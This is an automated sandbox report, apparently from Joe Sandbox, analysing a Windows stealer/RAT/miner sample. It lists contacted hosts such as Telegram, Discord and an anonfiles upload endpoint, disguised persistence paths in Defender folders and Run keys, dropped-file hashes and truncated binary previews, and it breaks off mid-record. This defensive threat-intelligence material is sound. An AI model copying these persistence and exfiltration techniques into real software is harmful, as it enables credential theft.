                                  http://google.com/mail/based.exe, 00000004.00000002.2382426374.00000201D080A000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1877831426.00000201D081E000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1857154542.00000201D081F000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1852139141.00000201D081F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.amazon.fr/based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://raw.githubusercontent.com/moshiax/minotaur-deepweb/main/image.pngbased.exe, 00000004.00000002.2382322398.00000201D0640000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.google.com/complete/based.exe, 00000004.00000002.2386609527.00000201D1074000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://www.openssl.org/Hbased.exe, 00000002.00000003.1684668275.000001F919A10000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000002.2394059861.00007FFDFAFB6000.00000004.00000001.01000000.00000019.sdmp, based.exe, 00000004.00000002.2392435887.00007FFDFAC52000.00000004.00000001.01000000.0000001A.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://api.anonfiles.com/uploadrUbased.exe, 00000004.00000003.1761254313.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1703231091.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1794515852.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1832574696.00000201D0852000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000004.00000003.1818589198.00000201D0852000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://aka.ms/pscore68powershell.exe, 00000011.00000002.1879607528.0000028A3B441000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  208.95.112.1
                                  ip-api.comUnited States
                                  53334TUT-ASUSfalse
                                  149.154.167.220
                                  api.telegram.orgUnited Kingdom
                                  62041TELEGRAMRUtrue
                                  162.159.136.232
                                  discord.comUnited States
                                  13335CLOUDFLARENETUStrue
                                  194.58.42.154
                                  unknownRussian Federation
                                  197695AS-REGRUfalse
                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1485736
                                  Start date and time:2024-08-01 04:26:09 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 13m 1s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:97
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:8Ck8T5qRcC.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:4FEC8FAF6590F62034AD44A54175B9E9.exe
                                  Detection:MAL
                                  Classification:mal100.rans.spre.troj.spyw.expl.evad.mine.winEXE@147/153@3/4
                                  EGA Information:
                                  • Successful, ratio: 80%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Exclude process from analysis (whitelisted): Conhost.exe, SIHClient.exe, WmiPrvSE.exe, schtasks.exe
                                  • Excluded IPs from analysis (whitelisted): 142.250.186.35
                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, pool.hashvault.pro, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target hacn.exe, PID 6804 because there are no executed function
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtCreateFile calls found.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                  • Report size getting too big, too many NtOpenFile calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                  TimeTypeDescription
                                  03:27:18Task SchedulerRun new task: HpQPPZazcv path: "C:\Recovery\HpQPPZazcv.exe"
                                  03:27:19Task SchedulerRun new task: HpQPPZazcvH path: "C:\Recovery\HpQPPZazcv.exe"
                                  03:27:21Task SchedulerRun new task: based path: "C:\Program Files\Windows Defender\en-US\based.exe"
                                  03:27:21Task SchedulerRun new task: basedb path: "C:\Program Files\Windows Defender\en-US\based.exe"
                                  03:27:21Task SchedulerRun new task: csrss path: "C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"
                                  03:27:21Task SchedulerRun new task: csrssc path: "C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"
                                  03:27:21Task SchedulerRun new task: GoogleUpdateTaskMachineQC path: %ProgramFiles%\Google\Chrome\updater.exe
                                  03:27:21Task SchedulerRun new task: powershell path: "C:\Recovery\powershell.exe"
                                  03:27:22Task SchedulerRun new task: powershellp path: "C:\Recovery\powershell.exe"
                                  03:27:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run HpQPPZazcv "C:\Windows\Prefetch\HpQPPZazcv.exe"
                                  03:27:33AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
                                  03:27:41AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run based "C:\Program Files\Windows Defender\en-US\based.exe"
                                  03:27:50AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"
                                  03:28:00AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run HpQPPZazcv "C:\Windows\Prefetch\HpQPPZazcv.exe"
                                  03:28:10AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
                                  03:28:19AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run based "C:\Program Files\Windows Defender\en-US\based.exe"
                                  03:28:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"
                                  03:28:36AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run HpQPPZazcv "C:\Windows\Prefetch\HpQPPZazcv.exe"
                                  03:28:44AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run powershell "C:\Recovery\powershell.exe"
                                  03:28:52AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run based "C:\Program Files\Windows Defender\en-US\based.exe"
                                  03:29:02AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe"
                                  03:29:19AutostartRun: WinLogon Shell "C:\Recovery\HpQPPZazcv.exe"
                                  03:29:27AutostartRun: WinLogon Shell "C:\Recovery\powershell.exe"
                                  22:27:05API Interceptor1x Sleep call for process: setup.exe modified
                                  22:27:09API Interceptor136x Sleep call for process: powershell.exe modified
                                  22:27:12API Interceptor1x Sleep call for process: WMIC.exe modified
                                  22:27:48API Interceptor21837x Sleep call for process: HpQPPZazcv.exe modified
                                  22:27:55API Interceptor2x Sleep call for process: cmd.exe modified
                                  22:27:55API Interceptor39x Sleep call for process: based.exe modified
                                  22:27:55API Interceptor10x Sleep call for process: conhost.exe modified
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  208.95.112.15oci4lcontract.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                  • ip-api.com/line/?fields=hosting
                                  Nursultan Alpha (perm).exeGet hashmaliciousXWormBrowse
                                  • ip-api.com/line/?fields=hosting
                                  QUOTATION.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • ip-api.com/line/?fields=hosting
                                  Inquiry.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                  • ip-api.com/line/?fields=hosting
                                  1722411965141529826f4dae57592d39157455e6b233f1635d04af2f411046a550ec754e7b174.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  Nuevo Orden.vbsGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  DHL- INVOICE-1851940333.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  • ip-api.com/line/?fields=hosting
                                  cotizaci#U00f2n.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  Orden-23014.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  Orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                  • ip-api.com/line/?fields=hosting
                                  149.154.167.220wslakcasiepsaa.scr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                    z61FACTURA98765RT67803.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                      Product Items.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                        0242_FV1_241356.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          Quotation.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                            PO4541 , PO4537.pdf.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                              FACTURA0876.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                  Confirmation transfer Copy AGS # 22-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    NEW LIST.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      162.159.136.232S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                      • discord.com/administrator/index.php
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      discord.comZoom_workspace.htaGet hashmaliciousCobalt Strike, Clipboard HijackerBrowse
                                                      • 162.159.138.232
                                                      SecuriteInfo.com.Python.Muldrop.16.5435.25481.exeGet hashmaliciousBlank GrabberBrowse
                                                      • 162.159.137.232
                                                      EJH8vdN1sP.exeGet hashmaliciousBlank GrabberBrowse
                                                      • 162.159.137.232
                                                      TamenuV11.msiGet hashmaliciousUnknownBrowse
                                                      • 162.159.135.232
                                                      http://discord-proxy.tassadar2002.workers.dev/Get hashmaliciousUnknownBrowse
                                                      • 162.159.138.232
                                                      http://dapi.190823.xyz/Get hashmaliciousUnknownBrowse
                                                      • 162.159.138.232
                                                      http://via.evove.topGet hashmaliciousUnknownBrowse
                                                      • 162.159.136.232
                                                      LisectAVT_2403002A_147.exeGet hashmaliciousBlank GrabberBrowse
                                                      • 162.159.138.232
                                                      LisectAVT_2403002A_210.exeGet hashmaliciousPython Stealer, Empyrean, Discord Token StealerBrowse
                                                      • 162.159.128.233
                                                      LisectAVT_2403002A_368.exeGet hashmaliciousBlank Grabber, DCRat, Umbral StealerBrowse
                                                      • 162.159.138.232
                                                      ip-api.com5oci4lcontract.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                      • 208.95.112.1
                                                      Nursultan Alpha (perm).exeGet hashmaliciousXWormBrowse
                                                      • 208.95.112.1
                                                      QUOTATION.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 208.95.112.1
                                                      Inquiry.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                      • 208.95.112.1
                                                      1722411965141529826f4dae57592d39157455e6b233f1635d04af2f411046a550ec754e7b174.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Nuevo Orden.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      DHL- INVOICE-1851940333.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 208.95.112.1
                                                      cotizaci#U00f2n.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Orden-23014.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      api.telegram.orgwslakcasiepsaa.scr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      z61FACTURA98765RT67803.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      Product Items.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      0242_FV1_241356.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 149.154.167.220
                                                      Quotation.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      PO4541 , PO4537.pdf.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                                      • 149.154.167.220
                                                      FACTURA.PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 149.154.167.220
                                                      FACTURA0876.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 149.154.167.220
                                                      Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 149.154.167.220
                                                      Confirmation transfer Copy AGS # 22-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 149.154.167.220
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      TELEGRAMRUhttps://khpornvideocambodia.vvipwww.com/Get hashmaliciousUnknownBrowse
                                                      • 149.154.167.99
                                                      https://distrosourcess6.sg-host.com/Get hashmaliciousUnknownBrowse
                                                      • 149.154.167.99
                                                      wslakcasiepsaa.scr.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      z61FACTURA98765RT67803.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      Product Items.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      0242_FV1_241356.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 149.154.167.220
                                                      Quotation.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                      • 149.154.167.220
                                                      PO4541 , PO4537.pdf.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                                      • 149.154.167.220
                                                      FACTURA0876.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 149.154.167.220
                                                      Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      • 149.154.167.220
                                                      AS-REGRUSecuriteInfo.com.Win32.RATX-gen.24742.674.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • 37.140.192.90
                                                      Payrol list.exeGet hashmaliciousFormBookBrowse
                                                      • 194.58.112.174
                                                      https://kaslasa.ru/Get hashmaliciousUnknownBrowse
                                                      • 31.31.196.178
                                                      QTmGYKK6SL.exeGet hashmaliciousUnknownBrowse
                                                      • 194.87.219.156
                                                      file.exeGet hashmaliciousVidarBrowse
                                                      • 194.87.219.156
                                                      LisectAVT_2403002C_106.exeGet hashmaliciousDarkbotBrowse
                                                      • 194.58.112.165
                                                      LisectAVT_2403002A_117.exeGet hashmaliciousRedLineBrowse
                                                      • 194.87.107.145
                                                      IIMG_00172424.exeGet hashmaliciousFormBookBrowse
                                                      • 37.140.192.90
                                                      SecuriteInfo.com.Trojan.PackedNET.2966.14355.23143.exeGet hashmaliciousFormBookBrowse
                                                      • 37.140.192.90
                                                      desDGzeznq.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                      • 194.87.181.56
                                                      CLOUDFLARENETUS#4857395846#.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • 104.21.47.110
                                                      http://eu.docusign.netGet hashmaliciousUnknownBrowse
                                                      • 1.1.1.1
                                                      https://eu.docusign.netGet hashmaliciousUnknownBrowse
                                                      • 104.18.66.57
                                                      https://app.getresponse.com/click.html?x=a62b&lc=hn2fb4&mc=Ju&s=BOXwMKM&u=ytovh&z=EJoIFfn&Get hashmaliciousUnknownBrowse
                                                      • 104.17.25.14
                                                      39d1db9cca45315f220c27a3de0fffe5d071c2a0c69c6e91efabe0655d61baf9_payload.exeGet hashmaliciousSnake KeyloggerBrowse
                                                      • 188.114.96.3
                                                      https://drive.google.com/file/d/1zSpnnmNby57iJjkk1VT46OLWl7gkrx-3/view?usp=sharing_eil_m&ts=66aa52c7Get hashmaliciousUnknownBrowse
                                                      • 172.64.41.3
                                                      http://is.gd/pttgovjxGet hashmaliciousUnknownBrowse
                                                      • 172.67.74.152
                                                      http://is.gd/pttgovyqa2Get hashmaliciousUnknownBrowse
                                                      • 188.114.97.3
                                                      https://khpornvideocambodia.vvipwww.com/Get hashmaliciousUnknownBrowse
                                                      • 188.114.96.3
                                                      https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=VEPAnwijpUm87o3xy8ND1cJ8xINveHJMur3NEXJwuyVUMTlIVElEVTE5QlBXTExERkQ0NDhHVElDMi4uGet hashmaliciousHTMLPhisherBrowse
                                                      • 104.17.25.14
                                                      TUT-ASUS5oci4lcontract.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                      • 208.95.112.1
                                                      Nursultan Alpha (perm).exeGet hashmaliciousXWormBrowse
                                                      • 208.95.112.1
                                                      QUOTATION.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 208.95.112.1
                                                      Inquiry.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                      • 208.95.112.1
                                                      1722411965141529826f4dae57592d39157455e6b233f1635d04af2f411046a550ec754e7b174.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Nuevo Orden.vbsGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      DHL- INVOICE-1851940333.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 208.95.112.1
                                                      cotizaci#U00f2n.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Orden-23014.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      Orden de compra.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                      • 208.95.112.1
                                                      No context
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      C:\ProgramData\setup.exeTS-240605-Millenium1.exeGet hashmaliciousBlank Grabber, Discord Token Stealer, Millenuim RAT, XmrigBrowse
                                                        DevxExecutor.exeGet hashmaliciousPython Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RATBrowse
                                                          hacn.exeGet hashmaliciousDiscord Token Stealer, Millenuim RAT, XmrigBrowse
                                                            C:\Program Files\Google\Chrome\updater.exeTS-240605-Millenium1.exeGet hashmaliciousBlank Grabber, Discord Token Stealer, Millenuim RAT, XmrigBrowse
                                                              DevxExecutor.exeGet hashmaliciousPython Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RATBrowse
                                                                hacn.exeGet hashmaliciousDiscord Token Stealer, Millenuim RAT, XmrigBrowse
                                                                  Process:C:\ProgramData\setup.exe
                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):5617152
                                                                  Entropy (8bit):7.71585644239634
                                                                  Encrypted:false
                                                                  SSDEEP:98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
                                                                  MD5:1274CBCD6329098F79A3BE6D76AB8B97
                                                                  SHA1:53C870D62DCD6154052445DC03888CDC6CFFD370
                                                                  SHA-256:BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                                                  SHA-512:A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                                  Joe Sandbox View:
                                                                  • Filename: TS-240605-Millenium1.exe, Detection: malicious, Browse
                                                                  • Filename: DevxExecutor.exe, Detection: malicious, Browse
                                                                  • Filename: hacn.exe, Detection: malicious, Browse
                                                                  Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:ASCII text, with very long lines (840), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):840
                                                                  Entropy (8bit):5.898817119590833
                                                                  Encrypted:false
                                                                  SSDEEP:12:aQUm7TOa2dD4kfYOpBamo8dUksBfTRc7qwBQB+gGtDiRDSZDo1/MZTEoz//X9cHG:3P7qaQfYGInt5ftc7CBxCUle39cV8
                                                                  MD5:3956A9909D50028358B18837C986CF24
                                                                  SHA1:5DD3107FB1C20923261F50893962B350CFD31F6D
                                                                  SHA-256:3AE16B33F09D436CA509334F7CACEA9C5CA69E9A35961E0A0EF9B3EC24D15059
                                                                  SHA-512:4A772E293D66130140B16FCF299B16F8CD325F02FC36958F09B058876FECB92C2CBE3DCDAC45A759C9518AA289B9FB1FC0455861FF0EA4F5D3DB01E9DEAE9C22
                                                                  Malicious:false
                                                                  Preview:PBN13hss1NOMWovO88wTFasubLeSaAchtjcSAnkZhURy9bChw2kijruzTcarCZR1vqdwMcOVXXvvJ3vAI7fiZ38Bzm9hN2WHCaDS8PUUoPKL68qZraiF3tb1sb7kcqIfBnst0cB2mL4KtwF06k0xTQNT8LkgSu17GpKSP7jOYqcszRI5WHn20VLuZZup2fk1T6DDmwk8AlYnxfeqCpKKG9Hvda30M4W2FlZ2OETjgp1O6h645DmNVZuUzRjL3uwGPgiMGlc7VknbH3z6d94IRJhp0FD6eHqw2v8a9tyTlo1uwTM5cnr4znyG82WAifdO41iV4Z6uKlgnRw3g2He0Zv7P62bGXxvGLn04u1BDr7tOGLyM9zIaAmyI3TZB7zWXzaco58wBGbJbCtIvEOHhoVFizsAbb9F1lWZptJQADHUjcWFKKo7tszsdV3zN7VjGWR0qUcB48GehAfFcmzQxCVJwn5UzUCCsiOMKfZ0smCulULdzxWlHEvDAIEDYILk5Ew9wT46N9hLAlibbceC7b4nwKMCbWbkabygiMqg2aXIhkDZknl6nJneJIMlH2f1h7vixB3Ov8JgDvGMHxcyuf6QxUXZ9EZA4gljyeliuWLpAGaXCAdUarGBAevdndPqjJmhKgXnL3EXTRQq3AW9kEjNZjjTsI5QHfF0e3Ngm0JgntssOEjnGPFejZHk6E4C8xPyLZLAw0Xu5Cjq10FojRJ2ZlRFvmji5Gi0d3gz2j0Q1VigzbsF9QdqnXZkIGOKQzyzdtM7UPv9b3AECuQU3dipn2MGe6qwUqACgtCFOvvtfdPuWUhYz4QwQJMlhGdXj8pu38iTr
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3720704
                                                                  Entropy (8bit):7.733352681119499
                                                                  Encrypted:false
                                                                  SSDEEP:98304:HbprIE95gfDVJJBuXHL5btA6w35A9HbAoC1kmXIioFl6:Hbbi1IXr5nmG9Hb7VmX86
                                                                  MD5:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                  SHA1:F5C550AB2576D2DAEFF9CB72A4D41D1BCFEE0E6D
                                                                  SHA-256:9308B0CE7206C60517DB7207C488B4FA1CC313413E5378D8BAC63B22CABCDD80
                                                                  SHA-512:B210C6B5D8DB31D8F4EA82A79FE4679CED289636570E3FD72A45C488FD2CD75ED74677D723C1BFA67432E46E71901CB6551595E1053448C2F5E297829A6E1B39
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Defender\en-US\based.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Defender\en-US\based.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8.........n.8.. ....8...@.. ....................... 9...........@................................. .8.K.....8.p.....................9...................................................... ............... ..H............text...t.8.. ....8................. ..`.rsrc...p.....8.......8.............@....reloc........9.......8.............@..B................P.8.....H...........L.......n............8......................................0..........(.... ........8........E....N.......)...M...8I...(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............Z.......~.......8....~....:.... ....8........~....([...~....(_... ....<.... ....~....{....:....& ....8....8.... ....~....{....:p...& ....8e......... ....~....{....9K...& ....8@...~....(S... .... .... ....s....~...
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:ASCII text, with very long lines (633), with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):633
                                                                  Entropy (8bit):5.889029102231242
                                                                  Encrypted:false
                                                                  SSDEEP:12:tMaIt3iFUSgVk5IOZerfSqnQ63IaanL83DNQh0JSdS:iaItAI/TNnQ64aanL82h0d
                                                                  MD5:DA7294504AF2A6AE90F7DD0FA842B8B8
                                                                  SHA1:F27750ADBF2D8F87CDFBBA4EEEB6B255ACCE12DE
                                                                  SHA-256:6D2686DA3615379835AD07F8FD95098CD1606B8D5A50BE710FD77D0BDE8FD201
                                                                  SHA-512:A7E5D5BCF3FA66D95AAB61660570112C16429769C8780578AE17B7E0B504DE10993D6780A3A0C618E32925845A81F681307E856D605A89B7E2E7E700AAD8FD27
                                                                  Malicious:false
                                                                  Preview:ctJYS7aaNvWhbiIRXJgye0XwNroyHEaAC8EWT8RBOUqMMwPm70TqnVIlVXLkSlSIUWecev8Z2fjJKLkbbC1QuuXrzcA6xqtnCh10RwIL24xHv9bKxtJQtBXk8xmBvBlLw6HnTuJo4qXz6P50B0JDhc3AKR1eKGa1TmVz1x1DkeVDohnt1v942hnTCGdB2pexPggU3G8N8GdDHzWmnHmYHf8w8CwvUzK59iyHBT0uxw6wEkMNu0YvCGquitV0UN2J5hDiBOkUQ1lUjLsX0jBebY332DjR79aj3w0ggnLfPDeKfVKXB7AuMYshoKq7pTXQaBbwUL1MXfOX3sXg2LP99qWeET1W7Nz6qOtd3YC0GxWrKUo6xJEdDXRup6sBUfPJqSqp83meJZ2MTpUtp5ixJV2S79y7qAflhNA1n873gkUofEb9l8WY6cAUaXs9FpyI3QpGodGq8pQiBNx2hzVsoHpEMqbPQ7y1vLuOYVUI2qaQLbTMkzcPUGewlk38B0ZA1Zx0cjdMeMz8qZ2uXPpafigpr8nybWHCQZZwodtAWQvHQfFMrJlwK8fS2HIe6puIFxsRAGF4fpEPxZYL2aGSvV1R3G3gUPEqfmCcxyMlDqQe4Qfdt7lficXu6
                                                                  Process:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3720704
                                                                  Entropy (8bit):7.733352681119499
                                                                  Encrypted:false
